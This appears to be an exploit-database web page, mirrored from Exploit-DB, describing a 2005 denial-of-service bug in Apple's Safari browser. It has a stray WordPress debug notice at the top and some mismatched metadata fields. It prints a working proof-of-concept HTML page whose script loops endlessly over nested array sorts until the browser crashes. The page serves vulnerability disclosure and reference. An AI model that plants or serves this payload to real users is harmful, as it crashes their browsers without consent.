Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Apple Safari Web Browser Denial of Service Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Safari Web Browser
by:
Unknown
5.5
CVSS
MEDIUM
Denial of Service
399
CWE
Product Name: Safari Web Browser
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2005-0896
CPE: a:apple:safari
Metasploit:
Other Scripts:
Platforms Tested: macOS
2005

Apple Safari Web Browser Denial of Service Vulnerability

The vulnerability in Apple Safari Web Browser can be exploited by performing an infinite JavaScript array sort operation, leading to a browser crash. It is believed that this vulnerability only causes a denial of service and is not capable of executing arbitrary code, although this has not been confirmed.

Mitigation:

There is currently no known mitigation for this vulnerability. It is recommended to use an alternative web browser until a patch is available.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11759/info

Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Navigation

Suggest Exploit

Services By CQR